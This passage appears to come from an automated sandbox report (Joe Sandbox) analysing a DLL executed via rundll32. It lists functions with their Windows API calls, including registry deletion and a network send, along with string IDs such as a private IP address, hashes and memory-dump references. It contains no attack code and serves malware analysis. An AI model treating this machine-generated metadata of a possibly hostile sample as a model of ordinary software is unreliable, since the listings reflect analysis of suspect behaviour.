                                                                                                                      • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                      • API String ID: 2418878492-2500072749
                                                                                                                      • Opcode ID: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                      • Instruction ID: 416d3485c59068a364c2a46f33bf17d30033b20eabc5154db7a9307924c289c3
                                                                                                                      • Opcode Fuzzy Hash: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                      • Instruction Fuzzy Hash: 45318F74A006449FCF06EFA0D8957AD77F9EF48300F914098E905EB292DB78EE04CB55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10015723 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                      • _memset.LIBCMT ref: 1001579D
                                                                                                                      • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                      • LoadBitmapA.USER32 ref: 10015807
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4271682439-3916222277
                                                                                                                      • Opcode ID: c2f9d16966c3e05c0f00d4b6f85f81d85042d6ca8df7dc6027e25f19a9a67901
                                                                                                                      • Instruction ID: 5c54a231f9e9e48bd6b355c1aaa1100c674665813244494f34750a8ed28325e6
                                                                                                                      • Opcode Fuzzy Hash: c2f9d16966c3e05c0f00d4b6f85f81d85042d6ca8df7dc6027e25f19a9a67901
                                                                                                                      • Instruction Fuzzy Hash: 1B31C072A00216DFEB10CF78DDCAAAE7BA5EB44645F15052AE506EF2C1EA31E9448750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10023B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                      • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                      • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2429671754-3916222277
                                                                                                                      • Opcode ID: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                      • Instruction ID: e2743fe1d96de1c748b152781f443ff04db9fb8b7a9177862e5f836bc5268938
                                                                                                                      • Opcode Fuzzy Hash: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                      • Instruction Fuzzy Hash: 5A41AD38D01289DEDB11CFE4D951ADDFBF4EF18340F20816AE945EB292EB749A44CB11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10018D05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: System$Metrics$InfoParameters
                                                                                                                      • String ID: B$DISPLAY
                                                                                                                      • API String ID: 3136151823-3316187204
                                                                                                                      • Opcode ID: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                      • Instruction ID: a878fcb1cedf1c60654c719a4428af0d7f153658fed9e58891951680bc1a7591
                                                                                                                      • Opcode Fuzzy Hash: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                      • Instruction Fuzzy Hash: 7F119471900334EBDF11DF54AC8465A7BA8EF1A794F004061FE08AE086D270DB40CBD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016D6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Edit
                                                                                                                      • API String ID: 0-554135844
                                                                                                                      • Opcode ID: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                      • Instruction ID: d7da207644b64a2d982eb74dcfc255ba7c8492391b78acd90f64b6ebdbaccf44
                                                                                                                      • Opcode Fuzzy Hash: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                      • Instruction Fuzzy Hash: 5401C034B00222ABEA50DA35DC45B5AB6F9EF4E795F120524F512EE0A1DF70ECC1C666
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10023C5A Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                      • SendMessageA.USER32 ref: 10023CD9
                                                                                                                      • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                      • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                      • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 187318432-0
                                                                                                                      • Opcode ID: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                      • Instruction ID: d28fad7a3843e667b269742353e4bf680cf5f7ebce9377355bc1d9e2da6f7a14
                                                                                                                      • Opcode Fuzzy Hash: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                      • Instruction Fuzzy Hash: 99416A38400746DFCB20DF64D845A9EB7F1FF08310F618959F9969B2A1EB74E941CB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016461 Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 69039007-0
                                                                                                                      • Opcode ID: 085ceebb537b79095729454c239c812d1055ab42ca5db445185b2e3eb14481ee
                                                                                                                      • Instruction ID: a0330575091f1317eb55619662e3d715b8734a83444e0781f194cac9bf36f8e0
                                                                                                                      • Opcode Fuzzy Hash: 085ceebb537b79095729454c239c812d1055ab42ca5db445185b2e3eb14481ee
                                                                                                                      • Instruction Fuzzy Hash: 0B21D075D0025ADFDB21CB54CC417EEB7B0EF08350F10412AED41AB290EB30AE84DBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002B3A9 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      • Opcode ID: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                      • Instruction ID: 63e99b0baf6d5dcfdd2b5bb48b7ec33f4fcd9c2a57d1919fdecc035dbf7e745c
                                                                                                                      • Opcode Fuzzy Hash: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                      • Instruction Fuzzy Hash: 2D110E71600A14EFDB21AF55CC84C0EBBE9EF89350B514829FA8597361DB31ED01CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002B437 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      • Opcode ID: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                      • Instruction ID: 3f65263faca37ec2066e18a28c5c11a55be6ae6448755079bbf75ecdaa8dd8b2
                                                                                                                      • Opcode Fuzzy Hash: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                      • Instruction Fuzzy Hash: 2511CE75600A14EFDB21AF55CC84C1EBBEAEF89750B118819FA8597361DB31EC01DB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100203DD Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                      • _memset.LIBCMT ref: 10020424
                                                                                                                      • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                      • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 289641511-0
                                                                                                                      • Opcode ID: f79365a65109cbbcc9a6bbc28f9d7fd9ec1dc43e3c7e56829fb32e92ee025925
                                                                                                                      • Instruction ID: 4dbc6bba0439fa9bebd62d9ace19f6e6ac74746b4d7c1d87a51b75f8b83cd490
                                                                                                                      • Opcode Fuzzy Hash: f79365a65109cbbcc9a6bbc28f9d7fd9ec1dc43e3c7e56829fb32e92ee025925
                                                                                                                      • Instruction Fuzzy Hash: DA01DBB5600314ABE711DF64DEC4BDF77ADEF19341F404065F646D3142EAB09E448761
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100329FD Relevance: 7.5, APIs: 5, Instructions: 43threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                        • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                        • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                        • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                        • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                      • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                        • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                      • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                      • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2731880238-0
                                                                                                                      • Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                      • Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
                                                                                                                      • Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                      • Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10012890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                      • SetWindowLongA.USER32 ref: 10012989
                                                                                                                        • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LongMenuWindow$AppendSystem
                                                                                                                      • String ID: 192.168.3.85$Message
                                                                                                                      • API String ID: 4121476972-856608562
                                                                                                                      • Opcode ID: a90c92772972697092915343de334961b3277e080dc7b5a44fb96fcdbf979901
                                                                                                                      • Instruction ID: 5cf2a2d3600ddfe9e3e75c53ffe40091173084dcd34b91a452ef246a626808d6
                                                                                                                      • Opcode Fuzzy Hash: a90c92772972697092915343de334961b3277e080dc7b5a44fb96fcdbf979901
                                                                                                                      • Instruction Fuzzy Hash: 12411B74A4020A9BDB04DB94CC52FBFB771EF44714F108228F5226F2D2DB75A945CB54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10013010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108memorynetworkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                        • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      • _strcat.LIBCMT ref: 1001310A
                                                                                                                        • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                      • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                      • String ID: :
                                                                                                                      • API String ID: 16450322-3653984579
                                                                                                                      • Opcode ID: 9ddd6bf09d0258533da1bacb9ba6165969689cc60440b7d914755c42b9ef06e0
                                                                                                                      • Instruction ID: 3ba3dcfd2515130731a8a819d4d55e20edbbe216b941dc915dfb352fa90348a6
                                                                                                                      • Opcode Fuzzy Hash: 9ddd6bf09d0258533da1bacb9ba6165969689cc60440b7d914755c42b9ef06e0
                                                                                                                      • Instruction Fuzzy Hash: F1412CB59001189FDB28DB64CC91BEEB775FF48304F1082ADE51AAB282DF346A84CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001C1A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                        • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                        • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                      Strings
